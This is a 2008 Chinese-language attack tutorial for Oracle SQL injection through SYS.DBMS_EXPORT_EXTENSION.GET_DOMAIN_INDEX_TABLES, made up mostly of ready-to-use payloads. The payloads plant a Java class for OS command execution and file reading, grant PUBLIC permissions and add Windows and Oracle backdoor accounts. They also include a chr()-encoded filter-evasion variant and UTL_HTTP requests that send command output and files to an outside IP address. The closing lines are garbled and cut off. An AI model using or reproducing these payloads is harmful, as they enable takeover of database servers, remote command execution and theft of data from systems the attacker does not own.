以下演示都是在 web 版 SQL*Plus 里直接执行的。在 web 注入时,把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

的形式即可。(加 'a'|| 是为了让条件恒为 true:|| 的优先级高于 <>,实际比较的是 '1' 和 'a'||子查询结果;即使函数返回 NULL 或空串,'a'||NULL 仍是 'a',条件照样成立。)
语句比较长,GET 可能超出 URL 长度限制,必要时改用 POST 提交。
以下是各个步骤:
1. 创建 Java 类
通过注入 SYS.DBMS_EXPORT_EXTENSION 包的 GET_DOMAIN_INDEX_TABLES 函数,在 Oracle 里创建 Java 类 LinxUtil,里面两个静态方法:runCMD 用于执行系统命令,readFile 用于读取文件。注入进去的 EXECUTE IMMEDIATE 实际上是以 SYS 的权限执行的,所以创建出来的对象都落在 SYS 模式下(后面调用时要写成 sys.LinxRunCMD):
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
注意第三个参数里是 PUT(:P1):":P1" 是 GET_DOMAIN_INDEX_TABLES 内部绑定的变量名,必须原样保留。有些转帖把 ":P" 当成表情符号吃掉了,变成 PUT( 1),那样语句很可能直接报错。后面所有语句同理(文末的 chr() 版本里 chr(58)||chr(80)||chr(49) 就是 :P1)。
------------------------
如果 URL 有长度限制,可以把 readFile() 方法去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
同时把后面步骤中所有针对 readFile() 的语句(创建 LinxReadFile 函数、给它授权、调用它)也一并去掉。
------------------------------
2. 赋 Java 权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
这里给 PUBLIC 授的是 java.io.FilePermission 对 <<ALL FILES>> 的 execute 权限,对应 runCMD 里的 Runtime.exec();readFile() 里的 FileReader 需要的是 read 权限,本文没有单独授予。如果 LinxReadFile 报 java.security.AccessControlException,先检查这一点。
3. 创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
4. 给 public 授予执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
(函数对象只有 EXECUTE 和 DEBUG 两种对象权限,写成 grant execute on LinxRunCMD to public 就够了。)
5. 测试上面的几步是否成功
and '1'<>(
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
)

and '1'<>(
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
)
两条都要用 '1'<>( ... ) 这种不带拼接的写法:函数不存在时子查询返回 NULL,整个条件为假,页面才会有差异。原帖第一条写成 '1'<>'11'||( ... ),'11'||NULL 仍是 '11',不管函数有没有建成功条件都为真,测不出区别。
6. 执行命令:
/xxx.jsp?id=1 and '1'<>(
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
)

/xxx.jsp?id=1 and '1'<>(
select sys.LinxReadFile('c:/boot.ini') from dual
)
这里没有拼 'a'||:Oracle 里空串等同于 NULL,如果命令没有任何输出(或者读的是空文件),'1'<>NULL 为假,页面会显示成"失败"。只是为了触发执行而不关心返回值的话,还是用前面 '1'<>'a'||( ... ) 的写法更稳。
注意 sys.LinxReadFile() 返回的是 VARCHAR2,不能用 "and 1<>" 代替 "and '1'<>"。另外两个 Java 方法都是把整个输出不加限制地拼成一个 String 再返回,命令输出或文件太大、超出 VARCHAR2 上限时调用会直接报错,必要时在 Java 里截断。
如果要查看运行结果,可以用 union(列数和各列类型必须与原查询一致,先探出列数,再把函数放到字符串类型的那一列上):
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用 UTL_HTTP.request() 把结果带外发到自己控制的服务器:
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxReadFile:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)
注意:用 UTL_HTTP.request 时,要用 REPLACE() 把空格、换行符替换掉,否则 URL 不合法,请求发不出去。换行要写 chr(10):Oracle 的字符串字面量不处理转义,原帖里的 '\n' 是反斜杠加 n 两个字符,替换不掉 Java 那边 readLine() 之后自己拼进去的真正换行。也可以整体 base64 编码:utl_encode.base64_encode 的入参和返回值都是 RAW,要写成 utl_raw.cast_to_varchar2(utl_encode.base64_encode(utl_raw.cast_to_raw(...))),而且编码结果里的 + 在 query string 里会被当成空格,编码输出本身也可能带换行,接收端要相应处理。
--------------------
7. 内部变化
通过以下查询可以看到 all_objects 里多出来的对象(这也是防守方排查这类入侵最直接的痕迹):
select owner, object_name, object_type, created from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
两个 LIKE 都要:函数名没加引号,被 Oracle 折成大写 LINXRUNCMD/LINXREADFILE;Java source 用了双引号 "LinxUtil",名字保留原大小写。
8. 删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
这一步只删了 LinxRunCMD。LinxReadFile、Java 对象 LinxUtil(JAVA SOURCE 和对应的 JAVA CLASS)以及第 2 步给 PUBLIC 的 FilePermission 都还留着,要清理干净得用同样的方式分别执行 drop function LinxReadFile、drop java source "LinxUtil",并用 dbms_java.revoke_permission 收回权限。
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建 Oracle 帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即(全部用 chr() 拼接、不含单引号的写法,常用于单引号被过滤的场合):
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
解码出来就是上面那条语句。区别是这里不经过 SQL 字面量的引号转义,所以上面写成 '' 的地方这里只是一个 chr(39),'''' 对应 chr(39)||chr(39)。
确定漏洞存在:
1<>(
select user_id from all_users where username='LINXSQL'
)
用户建出来了子查询才有值、条件才为真;没建成功时子查询返回 NULL,条件为假。
给 linxsql 连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行任意语句的函数 Linx_query(),执行成功返回数值 1。但它声明了 authid current_user,是调用者权限:虽然是借 SYS 的身份建出来的,调用时却只用注入点当前数据库用户的权限去执行,很可能只有普通权限,作用不大;真的要用的话可以考虑先用上面的方式 grant dba to 当前用户:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
)
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
6 m* e2 d2 o$ @1 g )